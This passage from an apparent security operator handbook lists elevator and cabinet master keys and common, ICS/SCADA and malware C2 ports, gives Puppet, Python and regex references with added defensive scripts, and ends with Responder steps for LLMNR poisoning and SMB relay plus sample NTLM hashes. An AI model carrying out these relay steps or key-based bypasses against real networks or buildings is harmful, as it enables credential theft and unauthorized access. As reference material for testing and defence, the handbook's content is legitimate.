                            OTIS elevators
UTH         OTIS            Floor lockout, inspection, access for OTIS
                            elevators
501CH       Schindler       Fire Service master key for Schindler elevators
J200        Monitor/Janus   Independent Service, fan, light, cabinet for
                            Monitor fixtures
J217        Monitor/Janus   Fire Service master key for Monitor fixtures
EX513       Innovation      Independent Service, fan, light, cabinet for
                            Innovation elevators
EX515       Innovation      Fire Service master key for Innovation
                            elevators
KONE3       KONE            Fire Service master key for KONE elevators

Available:
[Link]
[Link]
[Link]
[Link]

COMMON KEYS
KEY              DESCRIPTION
Linear 222343    Master key for Linear intercom system
DoorKing 16120   Master key for DoorKing intercom system
CH751            Extremely common cabinet key
C415A            Extremely common cabinet key
C413A            Common cabinet key
C420A            Common cabinet key
C642A            Common cabinet key
C346A            Common cabinet key
C390A            Common cabinet key
EK333            Common server cabinet key
Ilco CC1         Common golf cart key

REFERENCE:
[Link]
[Link]
[Link]

PORTS_Top1000
ALL INFORMATIONAL ALL
Top 1000 most common ports/services.

Port Proto Service        Port Proto Service
7 tcp echo 1022 udp exp2
7 udp echo 1025 tcp NFS/IIS
9 tcp discard 1025 udp blackjack
9 udp discard 1026 tcp LSA/nterm
13 tcp daytime 1026 udp win-rpc
17 udp qotd 1027 tcp IIS
19 udp chargen 1028 udp ms-lsa
21 tcp ftp 1029 tcp ms-lsa
22 tcp ssh 1029 udp solid-mux
23 tcp telnet 1030 udp iad1
25 tcp smtp 1110 tcp nfsd-status
26 tcp rsftp 1433 tcp ms-sql-s
37 tcp time 1433 udp ms-sql-s
49 udp tacacs 1434 udp ms-sql-m
53 tcp dns 1645 udp radius
53 udp dns 1646 udp radacct
67 udp dhcps 1701 udp L2TP
68 udp dhcpc 1718 udp h225gatedisc
69 udp tftp 1719 udp h323gatestat
79 tcp finger 1720 tcp h323q931
80 tcp http 1723 tcp pptp
80 udp http 1755 tcp wms
81 tcp hosts2-ns 1812 udp radius
88 tcp kerberos-sec 1813 udp radacct
88 udp kerberos-sec 1900 tcp upnp
106 tcp pop3pw 1900 udp upnp
110 tcp pop3 2000 tcp cisco-sccp
111 tcp rpcbind 2000 udp cisco-sccp
111 udp rpcbind 2001 tcp dc
113 tcp ident 2048 udp dls-monitor
119 tcp nntp 2049 tcp nfs
120 udp cfdptkt 2049 udp nfs
123 udp ntp 2121 tcp ccproxy-ftp
135 tcp msrpc 2222 udp msantipiracy
135 udp msrpc 2223 udp rockwell-csp2
136 udp profile 2717 tcp pn-requester
137 udp netbios-ns 3000 tcp ppp
138 udp netbios-dgm 3128 tcp squid-http
139 tcp netbios-ssn 3283 udp netassistant
139 udp netbios-ssn 3306 tcp mysql
143 tcp imap 3389 tcp ms-wbt-server
144 tcp news 3456 udp IISrpc/vat
158 udp pcmail-srv 3703 udp adobeserver-3
161 udp snmp 3986 tcp mapper-ws_ethd
162 udp snmptrap 4444 udp krb524
177 udp xdmcp 4500 udp nat-t-ike
179 tcp bgp 4899 tcp radmin
199 tcp smux 5000 tcp upnp
389 tcp ldap 5000 udp upnp
427 tcp svrloc 5009 tcp airport-admin
427 udp svrloc 5051 tcp ida-agent
443 tcp https 5060 tcp sip
443 udp https 5060 udp sip
444 tcp snpp 5101 tcp admdog
445 tcp microsoft-ds 5190 tcp aol
445 udp microsoft-ds 5353 udp zeroconf
465 tcp smtps 5357 tcp wsdapi
497 udp retrospect 5432 tcp postgresql
500 udp isakmp 5631 tcp pcanywheredata
513 tcp login 5632 udp pcanywherestat
514 tcp shell 5666 tcp nrpe
514 udp syslog 5800 tcp vnc-http
515 tcp printer 5900 tcp vnc
515 udp printer 6000 tcp X11
518 udp ntalk 6001 tcp X11-1
520 udp route 7070 tcp realserver
543 tcp klogin 8000 tcp alt-http
544 tcp kshell 8008 tcp http
548 tcp afp 8009 tcp ajp13
554 tcp rtsp 8080 tcp http-proxy
587 tcp message sub 8081 tcp blackice-icecap
593 udp rpc-epmap 8443 tcp alt-https
623 udp asf-rmcp 8888 tcp sun-answerbook
626 udp serialnumberd 8888 tcp sun-answerbook
631 tcp ipp 9100 tcp jetdirect
631 udp ipp 9200 udp wap-wsp
646 tcp ldp 9999 tcp abyss
873 tcp rsync 10000 udp ndmp
990 tcp ftps 10000 tcp snet-sensor-mgmt
993 tcp imaps 17185 udp wdbrpc
995 tcp pop3s 20031 udp bakbonenetvault
996 udp vsinet 31337 udp BackOrifice
997 udp maitrd 32768 tcp filenet-tms
998 udp puparp 32768 udp omad
999 udp applix 32769 udp filenet-rpc

PORTS_ICS/SCADA
ALL INFORMATIONAL ALL
Ports for common ICS/SCADA hardware.

Port Protocol Vendor
502 TCP Modbus TCP
1089 TCP:UDP Foundation Fieldbus HSE
1090 TCP:UDP Foundation Fieldbus HSE
1091 TCP:UDP Foundation Fieldbus HSE
1541 TCP:UDP Foxboro/Invensys Foxboro DCS Informix
2222 UDP EtherNet/IP
3480 TCP OPC UA Discovery Server
4000 TCP:UDP Emerson/Fisher ROC Plus
5050-5051 UDP Telvent OASyS DNA
5052 TCP Telvent OASyS DNA
5065 TCP Telvent OASyS DNA
5450 TCP OSIsoft PI Server
10307 TCP ABB Ranger 2003
10311 TCP ABB Ranger 2003
10364-10365 TCP ABB Ranger 2003
10407 TCP ABB Ranger 2003
10409-10410 TCP ABB Ranger 2003
10412 TCP ABB Ranger 2003
10414-10415 TCP ABB Ranger 2003
10428 TCP ABB Ranger 2003
10431-10432 TCP ABB Ranger 2003
10447 TCP ABB Ranger 2003
10449-10450 TCP ABB Ranger 2003
12316 TCP ABB Ranger 2003
12645 TCP ABB Ranger 2003
12647-12648 TCP ABB Ranger 2003
13722 TCP ABB Ranger 2003
11001 TCP:UDP Johnson Controls Metasys N1
12135-12137 TCP Telvent OASyS DNA
13724 TCP ABB Ranger 2003
13782-13783 TCP ABB Ranger 2003
18000 TCP Iconic Genesis32 GenBroker (TCP)
20000 TCP:UDP DNP3
34962 TCP:UDP PROFINET
34963 TCP:UDP PROFINET
34964 TCP:UDP PROFINET
34980 UDP EtherCAT
38589 TCP ABB Ranger 2003
38593 TCP ABB Ranger 2003
38000-38001 TCP SNC GENe
38011-38012 TCP SNC GENe
38014-38015 TCP SNC GENe
38200 TCP SNC GENe
38210 TCP SNC GENe
38301 TCP SNC GENe
38400 TCP SNC GENe
38600 TCP ABB Ranger 2003
38700 TCP SNC GENe
38971 TCP ABB Ranger 2003
39129 TCP ABB Ranger 2003
39278 TCP ABB Ranger 2003
44818 TCP:UDP EtherNet/IP
45678 TCP:UDP Foxboro/Invensys Foxboro DCS AIMAPI
47808 UDP BACnet/IP
50001-50016 TCP Siemens Spectrum Power TG
50018-50020 TCP Siemens Spectrum Power TG
50020-50021 UDP Siemens Spectrum Power TG
50025-50028 TCP Siemens Spectrum Power TG
50110-50111 TCP Siemens Spectrum Power TG
55000-55002 UDP FL-net Reception
55003 UDP FL-net Transmission
55555 TCP:UDP Foxboro/Invensys Foxboro DCS FoxAPI
56001-56099 TCP Telvent OASyS DNA
62900 TCP SNC GENe
62911 TCP SNC GENe
62924 TCP SNC GENe
62930 TCP SNC GENe
62938 TCP SNC GENe
62956-62957 TCP SNC GENe
62963 TCP SNC GENe
62981-62982 TCP SNC GENe
62985 TCP SNC GENe
62992 TCP SNC GENe
63012 TCP SNC GENe
63027-63036 TCP SNC GENe
63041 TCP SNC GENe
63075 TCP SNC GENe
63079 TCP SNC GENe
63082 TCP SNC GENe
63088 TCP SNC GENe
63094 TCP SNC GENe
65443 TCP SNC GENe

PORTS_Malware C2
BLUE TEAM THREAT HUNT ALL
Ports on which malware/C2 have been observed communicating.

Port Actor/Family
21 Blade Runner Doly Trojan Fore Invisible FTP WebEx WinCrash
23 Tiny Telnet Server
25 Antigen Email Password Sender Haebu Coceda Shtrilitz Stealth Terminator WinPC WinSpy Kuang2.0
31 Hackers Paradise
80 Executor
127 TYPEFRAME
456 Hackers Paradise
465 Zebrocy
555 Ini-Killer Phase Zero Stealth Spy
587 AgentTesla
587 Cannon
666 Satanz Backdoor
995 RedLeaves
1001 Silencer WebEx
1011 Doly Trojan
1058 Bankshot
1170 Psyber Stream Server Voice
1234 Ultors Trojan
1243 SubSeven 1.0 – 1.8
1245 VooDoo Doll
1349 Back Orifice DLL
1492 FTP99CMP
1600 Shivka-Burka
1807 SpySender
1981 Shockrave
1999 BackDoor 1.00-1.03
2001 Trojan Cow
2023 Ripper
2115 Bugs
2140 Deep Throat The Invasor
2801 Phineas Phucker
3024 WinCrash
3129 Masters Paradise
3150 Deep Throat The Invasor
3333 RevengeRAT
3700 Portal of Doom
3728 MobileOrder
4092 WinCrash
4567 File Nail 1
4590 ICQTrojan
5000 Bubbel
5001 Sockets de Troie
5321 Firehotcker
5400 Blade Runner 0.80 Alpha
5400 Blade Runner
5401 Blade Runner 0.80 Alpha
5401 Blade Runner
5402 Blade Runner 0.80 Alpha
5402 Blade Runner
5569 Robo-Hack
5742 WinCrash
6666 GorgonGroup
6670 DeepThroat
6771 DeepThroat
6969 GateCrasher Priority
7000 Remote Grab
7300 NetMonitor
7301 NetMonitor
7306 NetMonitor
7307 NetMonitor
7308 NetMonitor
7789 ICKiller
8088 Volgmer
8787 BackOrifice 2000
9872 Portal of Doom
9873 Portal of Doom
9874 Portal of Doom
9875 Portal of Doom
9989 iNi-Killer
10067 Portal of Doom
10167 Portal of Doom
10607 Coma 1.0.9
11000 Senna Spy
11223 Progenic trojan
12223 Hack'99 KeyLogger
12345 GabanBus NetBus
12346 GabanBus NetBus
12361 Whack-a-mole
12362 Whack-a-mole
13000 Remsec
14146 APT32
16969 Priority
20001 Millennium
20034 NetBus 2.0 Beta-NetBus 2.01
21544 GirlFriend 1.0 Beta-1.35
22222 Prosiak
23456 Evil FTP Ugly FTP
26274 Delta
30100 NetSphere 1.27a
30101 NetSphere 1.27a
30102 NetSphere 1.27a
31337 Back Orifice
31337 BackOrifice 1.20
31338 Back Orifice DeepBO
31338 DeepBO
31339 NetSpy DK
31666 BOWhack
33333 Prosiak
34324 BigGluck TN
40412 The Spy
40421 Masters Paradise
40422 Masters Paradise
40423 Masters Paradise
40426 Masters Paradise
46769 GravityRAT
47262 Delta
50505 Sockets de Troie
50766 Fore
53001 Remote Windows Shutdown
54321 SchoolBus .69-1.11
54321 BackOrifice 2000
61061 HiddenWasp
61466 Telecommando
65000 Devil
1177:8282 njRAT
1913:81 APT3
1985:1986 ZxShell
2280:1339 CoinTicker
4443:3543 MagicHound
[Link] [Link]
[Link] TrickBot
52100:5876 InnaputRAT
6666:4782 NanoCore
6868:7777 PoisonIvy
7080:50000 Emotet
8060:8888 POWERSTATS
808:880 APT33
[Link] Group5
[Link] LazarusGroup

REFERENCE:
[Link]
[Link]
[Link]
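On the blue-team side the table above is most useful as a lookup applied to outbound flow or firewall logs. The following Python script is an added example, not code from the handbook: it parses a subset of the table copied from the rows above (rows written "a:b" expand to both ports), scans constructed flow log lines, and reports each connection to a listed destination port together with the family the page associates with it. The log format and the IP addresses are assumptions for the demo. Several listed ports (25, 80, 465, 587, 995) are ordinary services, so a hit is a triage lead to be checked against the process and destination, not a verdict.

```python
#!/usr/bin/env python3
"""Match outbound flows against the page's observed malware/C2 port table."""
import re
from collections import defaultdict

# Subset of the table above, copied verbatim. Rows written "a:b" list more
# than one port for the same family; two rows can share a port (587).
C2_PORT_TABLE = """
23 Tiny Telnet Server
587 AgentTesla
587 Cannon
1243 SubSeven 1.0 – 1.8
8088 Volgmer
12345 GabanBus NetBus
31337 Back Orifice
1177:8282 njRAT
6666:4782 NanoCore
7080:50000 Emotet
"""

# Constructed flow records: <timestamp> <src>:<sport> -> <dst>:<dport> <proto>
SAMPLE_FLOWS = """
2020-04-02T10:00:01 10.0.0.5:51234 -> 203.0.113.10:443 tcp
2020-04-02T10:00:05 10.0.0.5:51240 -> 203.0.113.10:31337 tcp
2020-04-02T10:01:09 10.0.0.9:40010 -> 198.51.100.7:8282 tcp
2020-04-02T10:02:00 10.0.0.9:40011 -> 198.51.100.7:80 tcp
not a flow line at all
"""

FLOW_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<proto>\w+)$"
)


def parse_port_table(text):
    """Map port number -> set of actor/family names from the table text."""
    table = defaultdict(set)
    for line in text.strip().splitlines():
        ports, family = line.split(None, 1)
        for port in ports.split(":"):
            table[int(port)].add(family.strip())
    return table


def find_c2_port_hits(log_text, table):
    """Return (timestamp, src, dst, dport, [families]) for each flow whose
    destination port appears in the table; unparsable lines are skipped."""
    hits = []
    for line in log_text.strip().splitlines():
        match = FLOW_RE.match(line)
        if not match:
            continue
        dport = int(match.group("dport"))
        if dport in table:
            hits.append((match.group("ts"), match.group("src"),
                         match.group("dst"), dport, sorted(table[dport])))
    return hits


def format_hit(hit):
    ts, src, dst, dport, families = hit
    return f"{ts} {src} -> {dst}:{dport} matches {', '.join(families)}"


if __name__ == "__main__":
    table = parse_port_table(C2_PORT_TABLE)
    for hit in find_c2_port_hits(SAMPLE_FLOWS, table):
        print(format_hit(hit))
```

To use it on real data, paste the full table into `C2_PORT_TABLE` and point `find_c2_port_hits` at flow export lines in the same layout (or adjust `FLOW_RE` to your log format); enriching each hit with the owning process from the osquery `process_open_sockets` query earlier in the handbook is the natural next step.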

PUPPET
RED/BLUE TEAM ADMINISTRATION DEVOPS
Puppet is an open source software configuration management and
deployment tool.

Managing Puppet Services:
service puppetserver start               start puppet server service
chkconfig puppetserver on                enable puppet server service on boot
service puppet start                     start puppet agent service
chkconfig puppet on                      enable puppet agent service on boot

Managing Certificates (Master):
puppet cert list                         lists available nodes to sign
puppet cert list --all                   lists all signed nodes
puppet cert sign <name>                  manually sign specific node
puppet cert sign --all                   sign all nodes
puppet cert clean <name>                 removes cert

Managing Nodes (Master):
puppet node clean <name>                 removes node + cert

Managing Modules (Master):
puppet module list                       lists currently installed modules
puppet module install <name>             downloads/installs modules from [Link]m
puppet module uninstall <name>           removes/deletes module
puppet module upgrade <name>             upgrades to new version of module
puppet module search <name>              search modules from [Link]m

Managing Puppet Agent Master/Node:
puppet agent --test                      run puppet agent on demand
puppet agent --disable                   disables puppet agent
puppet agent --enable                    enables puppet agent
puppet agent --configprint config        print location of puppet agent
                                         configuration file
puppet agent -t --noop                   see what puppet is going to change
                                         without making the changes
puppet agent -t --noop /path/to/[Link]   see what puppet is going to change
                                         for a particular module
puppet agent --configprint runinterval   check runtime interval

Configuring Puppet
Setup Auto Cert Sign on Puppet Master (Master):
vi /etc/puppetlabs/puppet/[Link]f
  *.<DOMAIN>                             your domain name "[Link]"

Changing Puppet Agent Run Interval (Master/Node):
vi /etc/puppetlabs/puppet/[Link]
  [agent]
  runinterval = 1800                     default is every 30 minutes
                                         (1800 seconds)

Changing Puppet Agent Environment (Master/Node):
vi /etc/puppetlabs/puppet/[Link]
  [main]
  environment = <ENVIRONMENT>            default is "production"

Changing Puppet Agent Default Puppet Master Server (Master/Node):
vi /etc/puppetlabs/puppet/[Link]
  [main]
  server = <PUPPET_SERVER>               default is "puppet"

Troubleshooting Connection To The Puppet Master:
ping <IP>                                make sure puppet master is reachable
                                         via IP first
ping puppet                              make sure short domain name can reach
                                         the puppet master
ping [Link]                              make sure FQDN can reach the puppet
                                         master
vi /etc/hosts                            check that both FQDN / short domain
                                         name are entered on client side DNS
nslookup [Link]                          if using DNS server side then check
                                         if you can reach the nameservers +
                                         name
vi /etc/[Link]                           if using DNS server side check dns
                                         configuration is correct
service network restart                  restart connection, check if any
                                         errors
vi /etc/puppetlabs/puppet/[Link]         if using a custom puppet server check
                                         config to see if configured correctly
                                         to non default server
telnet [Link] 8140                       test connection to puppet server on
                                         port 8140
date -R                                  if time is out of sync get it in sync
                                         with the puppet master

SSL Regeneration:
puppet cert clean [Link]                 clean node (Master)
rm -rf $(puppet agent --configprint ssldir)   remove SSL certificate (Node)
puppet agent --test                      run puppet agent (Node)

REFERENCE:
[Link]

PYTHON
ALL INFORMATIONAL N/A

#Basic Script Template

#!/usr/bin/env python3
#
# Usage: .py
#

from collections import namedtuple
from dataclasses import make_dataclass
from enum import Enum
from sys import argv
import re

def main():
    pass

###
## UTIL
#

def read_file(filename):
    with open(filename, encoding='utf-8') as file:
        return [Link]()

if __name__ == '__main__':
    main()

File Operations
#Read a file line by line into a list. If you want the \n included:
with open(fname) as f:
    content = [Link]()

#If you do not want 'new lines' included:
with open(fname) as f:
    content = [Link]().splitlines()

#Move file to the dist_dir folder
[Link](<filename>, dist_dir + [Link] + <filename>)

#Get working directory
PWD = [Link]()

#Write file
RESOURCE = "[Link]"
fd = open(RESOURCE, 'w')
[Link]("first line\n")
[Link]()

Parsing Arguments
parser = [Link]()
parser.add_argument("-p", dest="payload", help=payloads, required=True)
parser.add_argument("-i", dest="interface", help="use interface - default: eth0", default="eth0")
args = parser.parse_args()
payload_type = [Link]
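The template, file-operation and argparse snippets above fit together into one small tool. The following script is an added example written for this page, not code from the handbook: it counts the source IPs on log lines that match a pattern (default "Failed password"), writes a report, and moves it into a distribution directory. The script name, flag names and the sshd-style sample lines are constructed for illustration.

```python
#!/usr/bin/env python3
#
# Usage: count_failed_logins.py -f <logfile> [-p <pattern>] [-o <report>] | --demo
#
# Added example built on the template and argparse snippet above; not handbook code.
# Script name, flags and SAMPLE_LINES are constructed for illustration.
import argparse
import os
import re
import shutil
import sys
import tempfile
from collections import Counter

# Dotted quad bounded by non-digits, so "10.0.0.5" is not found inside "10.0.0.55".
IPV4_RE = re.compile(r"(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)")

# Constructed sample input (sshd-style lines), used with --demo.
SAMPLE_LINES = [
    "Jan 10 10:01:02 host sshd[101]: Failed password for root from 10.0.0.5 port 51122 ssh2",
    "Jan 10 10:01:05 host sshd[102]: Failed password for admin from 10.0.0.5 port 51130 ssh2",
    "Jan 10 10:01:09 host sshd[103]: Accepted password for alice from 10.0.0.9 port 51140 ssh2",
    "Jan 10 10:02:11 host sshd[104]: Failed password for invalid user test from 192.168.1.20 port 40000 ssh2",
]

def build_parser():
    parser = argparse.ArgumentParser(description="Count source IPs on log lines matching a pattern")
    parser.add_argument("-f", dest="filename", help="log file to read (omit with --demo)")
    parser.add_argument("-p", dest="pattern", default="Failed password",
                        help="regex a line must match to be counted - default: 'Failed password'")
    parser.add_argument("-o", dest="outfile", default=None, help="write the report to this file")
    parser.add_argument("--demo", action="store_true", help="use the built-in sample lines")
    return parser

def read_lines(filename):
    """Read a file into a list of lines without trailing newlines."""
    with open(filename, encoding="utf-8") as fh:
        return fh.read().splitlines()

def count_ips(lines, pattern):
    """Return a Counter of every IPv4 address seen on lines matching pattern."""
    rx = re.compile(pattern)
    counts = Counter()
    for line in lines:
        if rx.search(line):
            counts.update(IPV4_RE.findall(line))
    return counts

def write_report(counts, outfile):
    """Write 'ip count' rows, most frequent first; returns the number of rows."""
    with open(outfile, "w", encoding="utf-8") as fh:
        for ip, n in counts.most_common():
            fh.write(f"{ip} {n}\n")
    return len(counts)

def move_to_dir(filename, dist_dir):
    """Move a file into dist_dir (created if missing) and return its new path."""
    os.makedirs(dist_dir, exist_ok=True)
    return shutil.move(filename, os.path.join(dist_dir, os.path.basename(filename)))

def demo_report():
    """Run the whole flow on the sample lines in a temp dir; returns (rows, final_path)."""
    workdir = tempfile.mkdtemp()
    report = os.path.join(workdir, "report.txt")
    rows = write_report(count_ips(SAMPLE_LINES, "Failed password"), report)
    final = move_to_dir(report, os.path.join(workdir, "dist"))
    return rows, final

def main(argv=None):
    parser = build_parser()
    args = parser.parse_args(argv)
    if not args.demo and not args.filename:
        parser.error("-f <file> or --demo is required")
    lines = SAMPLE_LINES if args.demo else read_lines(args.filename)
    counts = count_ips(lines, args.pattern)
    for ip, n in counts.most_common():
        print(f"{ip} {n}")
    if args.outfile:
        write_report(counts, args.outfile)
    return 0 if counts else 1

if __name__ == "__main__":
    sys.exit(main())
```

Run it as `count_failed_logins.py --demo` to see the two failing sources, or point `-f` at a real auth log. Keeping the work in small functions (`read_lines`, `count_ips`, `write_report`) is what makes the script importable and testable rather than a wall of top-level statements.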

REFERENCE:
[Link]
[Link]
[Link]
sheets/blob/master/docs/[Link]
[Link]
[Link]

REGEX
ALL INFORMATIONAL N/A

ANCHORS (symbol, description; then example / valid / invalid)

^          start of string or line
           example: ^foam            valid: foam        invalid: bath foam
\A         start of string in any match mode
           example: \Afoam           valid: foam        invalid: bath foam
$          end of string or line
           example: finish$          valid: finish      invalid: finnish
\Z         end of string, or char before last new line in any match mode
           example: finish\Z         valid: finish      invalid: finnish
\z         end of string, in any match mode
\G         end of the previous match or the start of the string for the first match
           example: ^(get|set)|\G\w+$   valid: setValue   invalid: seValue
\b         word boundary; position between a word character (\w) and a nonword character (\W)
           example: \bis\b           valid: This island is beautiful   invalid: This island isn't beautiful
\B         not-word-boundary
           example: \Bland           valid: island      invalid: peninsula

ASSERTIONS
(?=...)    positive lookahead
           example: question(?=s)    valid: questions   invalid: question
(?!...)    negative lookahead
           example: answer(?!s)      valid: answer      invalid: answers
(?<=...)   positive look-behind
           example: (?<=appl)e       valid: apple       invalid: application
(?<!...)   negative look-behind
           example: (?<!goo)d        valid: mood        invalid: good

CHAR CLASSES
[ ]        class definition
           example: [axf]            valid: a, x, f     invalid: b
[ - ]      class definition range
           example: [a-c]            valid: a, b, c     invalid: d
[ \ ]      escape inside class
           example: [a-f.]           valid: a, b, .     invalid: g
[^ ]       not in class
           example: [^abc]           valid: d, e        invalid: a
[:class:]  POSIX class
           example: [:alpha:]        valid: string      invalid: 0101
.          match any chars except new line
           example: [Link]           valid: battle, bottle   invalid: bttle
\s         white space, [\n\r\f\t ]
           example: good\smorning    valid: good morning   invalid: [Link]ing
\S         no-white space, [^\n\r\f\t]
           example: good\Smorning    valid: goodmorning    invalid: good morning
\d         digit
           example: \d{2}            valid: 23          invalid: 1a
\D         non-digit
           example: \D{3}            valid: foo, bar    invalid: fo1
\w         word, [a-zA-Z0-9_]
           example: \w{4}            valid: v411        invalid: v4.1
\W         non word, [^a-zA-Z0-9_]
           example: .$%?             valid: .$%?        invalid: .ab?

SEQUENCES
|                alternation
                 example: apple|orange          valid: apple, orange        invalid: melon
( )              subpattern
                 example: foot(er|ball)         valid: footer or football   invalid: footpath
(?P<name>...)    subpattern, and capture submatch into name
                 example: (?P<greeting>hello)   valid: hello                invalid: hallo
(?:...)          subpattern, but does not capture submatch
                 example: (?:hello)             valid: hello                invalid: hallo
+                one or more quantifier
                 example: ye+ah                 valid: yeah, yeeeah         invalid: yah
*                zero or more quantifier
                 example: ye*ah                 valid: yeeah, yeeeah, yah   invalid: yeh
?                zero or one quantifier
                 example: yes?                  valid: yes, ye              invalid: yess
??               zero or one, as few times as possible (lazy)
                 example: yea??h                valid: yeah                 invalid: yeaah
+?               one or more, lazy
                 example: /<.+?>/g              valid: <P>foo</P> matches only <P> and </P>
*?               zero or more, lazy
                 example: /<.*?>/g              valid: <html>
{n}              exactly n times
                 example: fo{2}                 valid: foo                  invalid: fooo
{n,m}            from n to m times
                 example: go{2,3}d              valid: good, goood          invalid: gooood
{n,}             at least n times
                 example: go{2,}                valid: goo, gooo            invalid: go
(?(condition)...)        if-then pattern
                 example: (<)?[p](?(1)>)        valid: <p>, p               invalid: <p
(?(condition)...|...)    if-then-else pattern
                 example: ^(?(?=q)que|ans)      valid: question, answer

SPECIAL CHAR   DESCRIPTION
\              general escape
\n             new line
\r             carriage return
\t             tab
\v             vertical tab
\f             form feed
\a             alarm
[\b]           backspace
\e             escape
\cchar         Ctrl + char (ie: \cc is Ctrl+c)
\ooo           three digit octal (ie: \123)
\xhh           one or two digit hexadecimal (ie: \x10)
\x{hex}        any hexadecimal code (ie: \x{1234})
\p{xx}         char with unicode property (ie: \p{Arabic})
\P{xx}         char without unicode property

PATTERN MOD    DESCRIPTION
g              global match
i              case-insensitive, match both uppercase and lowercase
m              multiple lines
s              single line (by default)
x              ignore whitespace, allows comments
A              anchored, the pattern is forced to ^
D              dollar end only, a dollar metacharacter matches only at the end
S              extra analysis performed, useful for non-anchored patterns
U              ungreedy, greedy patterns become lazy by default
X              additional functionality of PCRE (PCRE extra)
J              allow duplicate names for subpatterns
u              unicode, pattern and subject strings are treated as UTF-8
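The rows above are easiest to trust once you have run them. The block below is an added example for this page (not from the handbook) that checks the table's valid/invalid columns against Python's `re` module and demonstrates the anchor, lazy-quantifier and modifier behaviour that trips people up in detection rules. Python differs from PCRE in a few rows: it has no `\z` (its `\Z` already means absolute end of string), no `\G`, no POSIX `[:alpha:]`, and its conditional `(?(...)...)` accepts only a group number or name, so those rows are left out; anchors were added to some patterns so that "valid" means the whole string.

```python
import re

# Added example: rows from the table above, checked with Python's re module.
# (pattern, strings that must match, strings that must not match)
TABLE_ROWS = [
    (r"^foam", ["foam"], ["bath foam"]),
    (r"finish$", ["finish"], ["finnish"]),
    (r"\bis\b", ["This island is beautiful"], ["This island isn't beautiful"]),
    (r"\Bland", ["island"], ["peninsula"]),
    (r"question(?=s)", ["questions"], ["question"]),
    (r"answer(?!s)", ["answer"], ["answers"]),
    (r"(?<=appl)e", ["apple"], ["application"]),
    (r"(?<!goo)d", ["mood"], ["good"]),
    (r"^[a-f.]$", ["a", "b", "."], ["g"]),
    (r"^[^abc]$", ["d", "e"], ["a"]),
    (r"^\d{2}$", ["23"], ["1a"]),
    (r"^\D{3}$", ["foo", "bar"], ["fo1"]),
    (r"^\w{4}$", ["v411"], ["v4.1"]),
    (r"^foot(er|ball)$", ["footer", "football"], ["footpath"]),
    (r"^ye+ah$", ["yeah", "yeeeah"], ["yah"]),
    (r"^ye*ah$", ["yeeah", "yeeeah", "yah"], ["yeh"]),
    (r"^yes?$", ["yes", "ye"], ["yess"]),
    (r"^go{2,3}d$", ["good", "goood"], ["gooood"]),
    (r"^go{2,}$", ["goo", "gooo"], ["go"]),
    (r"^(<)?p(?(1)>)$", ["<p>", "p"], ["<p"]),   # if-then: '>' required only when group 1 matched
]

def row_holds(pattern, valid, invalid):
    """True when every 'valid' string matches and no 'invalid' string does."""
    rx = re.compile(pattern)
    return all(rx.search(s) for s in valid) and not any(rx.search(s) for s in invalid)

def check_table():
    """Map each pattern to whether Python agrees with the table's columns."""
    return {p: row_holds(p, v, i) for p, v, i in TABLE_ROWS}

def lazy_vs_greedy(text="<P>foo</P>"):
    """Greedy .+ swallows the whole tag pair; lazy .+? stops at the first '>'."""
    return re.findall(r"<.+>", text), re.findall(r"<.+?>", text)

def named_group(text="hello"):
    m = re.match(r"(?P<greeting>hello)", text)
    return m.groupdict() if m else None

def anchor_modes():
    """^ vs \\A under the m (multiline) modifier: counts of matches in a 3-line text."""
    text = "foam\nbath foam\nfoam"
    return (len(re.findall(r"^foam", text)),
            len(re.findall(r"^foam", text, re.M)),
            len(re.findall(r"\Afoam", text, re.M)))

def end_anchors(text="finish\n"):
    """$ still matches before a trailing newline; Python's \\Z (PCRE \\z) does not."""
    return bool(re.search(r"finish$", text)), bool(re.search(r"finish\Z", text))

VERBOSE = re.compile(r"""
    \d{2}   # two digits
    \.      # a literal dot
    \d+     # fraction
""", re.X)

def modifiers():
    """i (case-insensitive), s (dot matches newline) and x (verbose) in action."""
    return (bool(re.search(r"FOAM", "bath foam", re.I)),
            bool(re.search(r"a.b", "a\nb")),
            bool(re.search(r"a.b", "a\nb", re.S)),
            bool(VERBOSE.fullmatch("23.5")))
```

`end_anchors` is the row worth remembering when a rule validates input: a pattern ending in `$` accepts `"finish\n"`, so anchor with `\Z` (or PCRE `\z`) when the trailing newline must not be allowed.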

REFERENCE:
[Link]
[Link]

RESPONDER
RED TEAM ESCALATE PRIV ALL
Responder is an LLMNR, NBT-NS and MDNS poisoner and will answer to
specific NBT-NS queries on the network based on their name suffix.

Responder listens on ports: UDP 53,137,138,389,1434 TCP
21,25,80,110,139,389,445,587,1433,3128,3141 and Multicast UDP 5553.

python [Link] -I <interface>

EXAMPLE HASHES
(NTLMv1 SSP Enabled Hash Example)
hashcat::admin-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788

(NTLMv1 No-SSP Hash Example)
hashcat::admin-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

(NTLMv2 Hash Example)
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030

[Link] – location for modifying various Responder configuration
settings

Target a specific IP address on the network and limit possible
network disruptions: edit the [Link] file value "RespondTo" and
add the range 10.X.X.1-10 or the host 10.X.X.2 you are targeting.

Target a particular NBT-NS/LLMNR name: edit the [Link] file value
"RespondToName" to a targeted spoof hostname, e.g. SQLSERVER-01,
FILESHARE02, ...

Use analyze mode '-A' when trying to gauge how noisy the target IP
space may be in order to watch requests:

python [Link] -I <interface> -A

MULTI-RELAY w/ RESPONDER
STEP 1: Disable HTTP & SMB servers by editing the [Link] file.

STEP 2: Run [Link] to check whether a host has SMB Signing: False.
[Link] is located in the tools directory. This script lets you
verify which hosts report SMB Signing: False. SMB signing being
disabled is crucial for this relay attack; otherwise the target for
relaying isn't vulnerable to it.
python [Link] -i 10.X.X.0/24

STEP 3: Start [Link]
python [Link] -I <interface>

STEP 4: Start the Multi-Relay tool to route captured hashes to our
Target IP. Caveat: the user "-u" target must be a local
administrator on the host.
python [Link] -t <Target IP> -u ALL

**MacOS/OSX: Responder must be started with an IP address for the
-i flag (e.g. -i YOUR_IP_ADDR). There is no native support in OSX
for custom interface binding. Using -i en1 will not work.
